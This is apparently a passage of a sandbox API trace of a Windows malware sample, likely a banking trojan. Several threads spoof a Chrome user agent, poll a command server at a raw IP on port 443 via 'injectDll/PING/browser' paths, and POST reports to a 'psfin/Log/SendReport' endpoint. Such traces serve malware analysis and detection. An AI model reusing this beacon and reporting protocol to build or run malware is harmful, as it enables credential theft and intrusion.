	[0224.640] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x227bb08) returned 1
	[0224.640] Sleep (dwMilliseconds=0xbb8) 
	[0227.839] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778690) returned 1
	[0227.839] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22acf58) returned 1
	[0227.839] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225da8) returned 1
	[0227.839] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778668) returned 1
	[0227.839] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0227.839] WinHttpCloseHandle (hInternet=0x24d5b0) returned 1
	[0227.839] WinHttpCloseHandle (hInternet=0x22c55e8) returned 1
	[0227.839] WinHttpCloseHandle (hInternet=0x22c5500) returned 1
	[0227.839] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1

Thread:
	id = 283
	os_tid = 0xa2c

	[0224.176] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5e10
	[0224.176] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0224.176] WinHttpConnect (hSession=0x22c5e10, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5ef8
	[0224.176] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778a00
	[0224.176] WinHttpSetTimeouts (hInternet=0x22c5e10, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0224.176] WinHttpOpenRequest (hConnect=0x22c5ef8, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x2745158
	[0224.177] WinHttpSetOption (hInternet=0x2745158, dwOption=0x1f, lpBuffer=0x34ef234, dwBufferLength=0x4) returned 1
	[0224.177] WinHttpSendRequest (hRequest=0x2745158, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0225.586] WinHttpReceiveResponse (hRequest=0x2745158, lpReserved=0x0) returned 1
	[0225.586] WinHttpQueryHeaders (in: hRequest=0x2745158, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x34ef224, lpdwBufferLength=0x34ef220, lpdwIndex=0x0 | out: lpBuffer=0x34ef224*, lpdwBufferLength=0x34ef220*=0x4, lpdwIndex=0x0) returned 1
	[0225.586] Sleep (dwMilliseconds=0xbb8) 
	[0228.914] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778910) returned 1
	[0228.914] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b76c8) returned 1
	[0228.914] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788e8) returned 1
	[0228.914] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27788c0) returned 1
	[0228.914] WinHttpCloseHandle (hInternet=0x2745158) returned 1
	[0228.914] WinHttpCloseHandle (hInternet=0x22c5ef8) returned 1
	[0228.914] WinHttpCloseHandle (hInternet=0x22c5e10) returned 1
	[0228.914] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1

Thread:
	id = 284
	os_tid = 0xa40

	[0224.675] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5fe0
	[0224.676] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0224.676] WinHttpConnect (hSession=0x22c5fe0, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c60c8
	[0224.676] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778c80
	[0224.677] WinHttpSetTimeouts (hInternet=0x22c5fe0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0224.677] WinHttpOpenRequest (hConnect=0x22c60c8, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x274f5a0
	[0224.677] WinHttpSetOption (hInternet=0x274f5a0, dwOption=0x1f, lpBuffer=0x35ef234, dwBufferLength=0x4) returned 1
	[0224.677] WinHttpSendRequest (hRequest=0x274f5a0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0225.426] WinHttpReceiveResponse (hRequest=0x274f5a0, lpReserved=0x0) returned 1
	[0225.427] WinHttpQueryHeaders (in: hRequest=0x274f5a0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x35ef224, lpdwBufferLength=0x35ef220, lpdwIndex=0x0 | out: lpBuffer=0x35ef224*, lpdwBufferLength=0x35ef220*=0x4, lpdwIndex=0x0) returned 1
	[0225.427] Sleep (dwMilliseconds=0xbb8) 
	[0228.666] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b90) returned 1
	[0228.666] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7620) returned 1
	[0228.666] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b68) returned 1
	[0228.666] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778b40) returned 1
	[0228.666] WinHttpCloseHandle (hInternet=0x274f5a0) returned 1
	[0228.666] WinHttpCloseHandle (hInternet=0x22c60c8) returned 1
	[0228.666] WinHttpCloseHandle (hInternet=0x22c5fe0) returned 1
	[0228.667] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778c80) returned 1

Thread:
	id = 309
	os_tid = 0xa10

	[0228.405] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5500
	[0228.405] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0228.405] WinHttpConnect (hSession=0x22c5500, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c55e8
	[0228.405] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778550
	[0228.405] WinHttpSetTimeouts (hInternet=0x22c5500, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0228.405] WinHttpOpenRequest (hConnect=0x22c55e8, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x22c98d8
	[0228.405] WinHttpSetOption (hInternet=0x22c98d8, dwOption=0x1f, lpBuffer=0x268f234, dwBufferLength=0x4) returned 1
	[0228.405] WinHttpSendRequest (hRequest=0x22c98d8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0229.267] WinHttpReceiveResponse (hRequest=0x22c98d8, lpReserved=0x0) returned 1
	[0229.267] WinHttpQueryHeaders (in: hRequest=0x22c98d8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x268f224, lpdwBufferLength=0x268f220, lpdwIndex=0x0 | out: lpBuffer=0x268f224*, lpdwBufferLength=0x268f220*=0x4, lpdwIndex=0x0) returned 1
	[0229.267] Sleep (dwMilliseconds=0xbb8) 
	[0232.301] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778758) returned 1
	[0232.301] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b75d8) returned 1
	[0232.301] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778708) returned 1
	[0232.301] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778780) returned 1
	[0232.301] WinHttpCloseHandle (hInternet=0x22c98d8) returned 1
	[0232.301] WinHttpCloseHandle (hInternet=0x22c55e8) returned 1
	[0232.301] WinHttpCloseHandle (hInternet=0x22c5500) returned 1
	[0232.301] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778550) returned 1

Thread:
	id = 310
	os_tid = 0xd44

	[0228.440] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c57b8
	[0228.441] lstrcmpiW (lpString1="Log", lpString2="SINJ") returned -1
	[0228.441] WinHttpConnect (hSession=0x22c57b8, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c58a0
	[0228.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777f88
	[0228.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mismatch parameters count!", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27
	[0228.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778398
	[0228.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mismatch parameters count!", cchWideChar=-1, lpMultiByteStr=0x2778398, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mismatch parameters count!", lpUsedDefaultChar=0x0) returned 27
	[0228.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778280
	[0228.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7938
	[0228.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7950
	[0228.441] GetTickCount () returned 0xa8f52a
	[0228.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0228.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x2773190
	[0228.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x2d8eb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0228.441] WinHttpSetTimeouts (hInternet=0x22c57b8, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0228.441] WinHttpOpenRequest (hConnect=0x22c58a0, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/psfin/Log/SendReport/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26e438
	[0228.441] WinHttpSetOption (hInternet=0x26e438, dwOption=0x1f, lpBuffer=0x2d8f228, dwBufferLength=0x4) returned 1
	[0228.441] WinHttpSendRequest (hRequest=0x26e438, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB9DAA\r\nContent-Length: 131\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x2773190*, dwOptionalLength=0x83, dwTotalLength=0x83, dwContext=0x0) returned 1
	[0228.893] WinHttpReceiveResponse (hRequest=0x26e438, lpReserved=0x0) returned 1
	[0228.893] WinHttpQueryHeaders (in: hRequest=0x26e438, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2d8f218, lpdwBufferLength=0x2d8f214, lpdwIndex=0x0 | out: lpBuffer=0x2d8f218*, lpdwBufferLength=0x2d8f214*=0x4, lpdwIndex=0x0) returned 1
	[0228.893] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778280) returned 1
	[0228.893] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7938) returned 1
	[0228.893] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7950) returned 1
	[0228.893] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778398) returned 1
	[0228.893] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311000) returned 1
	[0228.893] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2773190) returned 1
	[0228.893] Sleep (dwMilliseconds=0xbb8) 
	[0232.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7698) returned 1
	[0232.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7680) returned 1
	[0232.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c71a0) returned 1
	[0232.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778640) returned 1
	[0232.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27787d0) returned 1
	[0232.176] WinHttpCloseHandle (hInternet=0x26e438) returned 1
	[0232.176] WinHttpCloseHandle (hInternet=0x22c58a0) returned 1
	[0232.176] WinHttpCloseHandle (hInternet=0x22c57b8) returned 1
	[0232.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777f88) returned 1

Thread:
	id = 311
	os_tid = 0xd48

	[0228.443] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c4ea8
	[0228.443] lstrcmpiW (lpString1="Log", lpString2="SINJ") returned -1
	[0228.443] WinHttpConnect (hSession=0x22c4ea8, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5248
	[0228.443] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e98
	[0228.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Report successfully sent", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25
	[0228.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231c7c0
	[0228.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Report successfully sent", cchWideChar=-1, lpMultiByteStr=0x231c7c0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Report successfully sent", lpUsedDefaultChar=0x0) returned 25
	[0228.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b3c0
	[0228.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7a58
	[0228.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7a70
	[0228.444] GetTickCount () returned 0xa8f52a
	[0228.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311318
	[0228.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x90) returned 0x27730f8
	[0228.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x2edeb24, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5
	[0228.444] WinHttpSetTimeouts (hInternet=0x22c4ea8, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=2700000, nReceiveTimeout=180000) returned 1
	[0228.444] WinHttpOpenRequest (hConnect=0x22c5248, pwszVerb="POST", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/psfin/Log/SendReport/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26b64b0
	[0228.444] WinHttpSetOption (hInternet=0x26b64b0, dwOption=0x1f, lpBuffer=0x2edf228, dwBufferLength=0x4) returned 1
	[0228.444] WinHttpSendRequest (hRequest=0x26b64b0, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary01BB9DAA\r\nContent-Length: 129\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x27730f8*, dwOptionalLength=0x81, dwTotalLength=0x81, dwContext=0x0) returned 1
	[0228.890] WinHttpReceiveResponse (hRequest=0x26b64b0, lpReserved=0x0) returned 1
	[0228.890] WinHttpQueryHeaders (in: hRequest=0x26b64b0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x2edf218, lpdwBufferLength=0x2edf214, lpdwIndex=0x0 | out: lpBuffer=0x2edf218*, lpdwBufferLength=0x2edf214*=0x4, lpdwIndex=0x0) returned 1
	[0228.890] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231b3c0) returned 1
	[0228.890] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7a58) returned 1
	[0228.890] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7a70) returned 1
	[0228.890] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231c7c0) returned 1
	[0228.890] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311318) returned 1
	[0228.890] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27730f8) returned 1
	[0228.890] Sleep (dwMilliseconds=0xbb8) 
	[0232.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7548) returned 1
	[0232.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7500) returned 1
	[0232.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7470) returned 1
	[0232.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778410) returned 1
	[0232.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27783e8) returned 1
	[0232.176] WinHttpCloseHandle (hInternet=0x26b64b0) returned 1
	[0232.176] WinHttpCloseHandle (hInternet=0x22c5248) returned 1
	[0232.176] WinHttpCloseHandle (hInternet=0x22c4ea8) returned 1
	[0232.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777e98) returned 1

Thread:
	id = 317
	os_tid = 0xd80

	[0229.524] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5e10
	[0229.524] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0229.524] WinHttpConnect (hSession=0x22c5e10, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5ef8
	[0229.524] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27789b0
	[0229.524] WinHttpSetTimeouts (hInternet=0x22c5e10, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0229.524] WinHttpOpenRequest (hConnect=0x22c5ef8, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26cdc48
	[0229.524] WinHttpSetOption (hInternet=0x26cdc48, dwOption=0x1f, lpBuffer=0x31ef234, dwBufferLength=0x4) returned 1
	[0229.525] WinHttpSendRequest (hRequest=0x26cdc48, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0230.200] WinHttpReceiveResponse (hRequest=0x26cdc48, lpReserved=0x0) returned 1
	[0230.200] WinHttpQueryHeaders (in: hRequest=0x26cdc48, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x31ef224, lpdwBufferLength=0x31ef220, lpdwIndex=0x0 | out: lpBuffer=0x31ef224*, lpdwBufferLength=0x31ef220*=0x4, lpdwIndex=0x0) returned 1
	[0230.200] Sleep (dwMilliseconds=0xbb8) 
	[0233.238] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778988) returned 1
	[0233.238] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b7728) returned 1
	[0233.238] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0233.238] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778a00) returned 1
	[0233.238] WinHttpCloseHandle (hInternet=0x26cdc48) returned 1
	[0233.238] WinHttpCloseHandle (hInternet=0x22c5ef8) returned 1
	[0233.238] WinHttpCloseHandle (hInternet=0x22c5e10) returned 1
	[0233.238] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27789b0) returned 1

Thread:
	id = 319
	os_tid = 0xd88

	[0230.134] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5418
	[0230.134] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0230.134] WinHttpConnect (hSession=0x22c5418, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5078
	[0230.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ef48
	[0230.134] WinHttpSetTimeouts (hInternet=0x22c5418, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0230.134] WinHttpOpenRequest (hConnect=0x22c5078, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x271f00
	[0230.134] WinHttpSetOption (hInternet=0x271f00, dwOption=0x1f, lpBuffer=0x32ef234, dwBufferLength=0x4) returned 1
	[0230.134] WinHttpSendRequest (hRequest=0x271f00, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0230.585] WinHttpReceiveResponse (hRequest=0x271f00, lpReserved=0x0) returned 1
	[0230.585] WinHttpQueryHeaders (in: hRequest=0x271f00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x32ef224, lpdwBufferLength=0x32ef220, lpdwIndex=0x0 | out: lpBuffer=0x32ef224*, lpdwBufferLength=0x32ef220*=0x4, lpdwIndex=0x0) returned 1
	[0230.585] Sleep (dwMilliseconds=0xbb8) 
	[0233.629] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231eb88) returned 1
	[0233.629] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b77d0) returned 1
	[0233.629] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231eb60) returned 1
	[0233.629] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231eb38) returned 1
	[0233.629] WinHttpCloseHandle (hInternet=0x271f00) returned 1
	[0233.629] WinHttpCloseHandle (hInternet=0x22c5078) returned 1
	[0233.629] WinHttpCloseHandle (hInternet=0x22c5418) returned 1
	[0233.630] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1

Thread:
	id = 326
	os_tid = 0xd7c

	[0233.088] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5500
	[0233.088] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0233.089] WinHttpConnect (hSession=0x22c5500, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c55e8
	[0233.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778488
	[0233.089] WinHttpSetTimeouts (hInternet=0x22c5500, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0233.089] WinHttpOpenRequest (hConnect=0x22c55e8, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26e438
	[0233.089] WinHttpSetOption (hInternet=0x26e438, dwOption=0x1f, lpBuffer=0x268f234, dwBufferLength=0x4) returned 1
	[0233.089] WinHttpSendRequest (hRequest=0x26e438, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0234.506] WinHttpReceiveResponse (hRequest=0x26e438, lpReserved=0x0) returned 1
	[0234.506] WinHttpQueryHeaders (in: hRequest=0x26e438, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x268f224, lpdwBufferLength=0x268f220, lpdwIndex=0x0 | out: lpBuffer=0x268f224*, lpdwBufferLength=0x268f220*=0x4, lpdwIndex=0x0) returned 1
	[0234.506] Sleep (dwMilliseconds=0xbb8) 
	[0237.745] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27785a0) returned 1
	[0237.745] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe58) returned 1
	[0237.745] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777d58) returned 1
	[0237.745] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27782a8) returned 1
	[0237.745] WinHttpCloseHandle (hInternet=0x26e438) returned 1
	[0237.745] WinHttpCloseHandle (hInternet=0x22c55e8) returned 1
	[0237.745] WinHttpCloseHandle (hInternet=0x22c5500) returned 1
	[0237.745] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1

Thread:
	id = 327
	os_tid = 0xdc0

	[0233.628] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x22c5e10
	[0233.628] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0233.628] WinHttpConnect (hSession=0x22c5e10, pswzServerName="95.213.191.109", nServerPort=0x1bb, dwReserved=0x0) returned 0x22c5ef8
	[0233.628] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778938
	[0233.628] WinHttpSetTimeouts (hInternet=0x22c5e10, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0233.628] WinHttpOpenRequest (hConnect=0x22c5ef8, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/64/injectDll/PING/browser/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x26b64b0
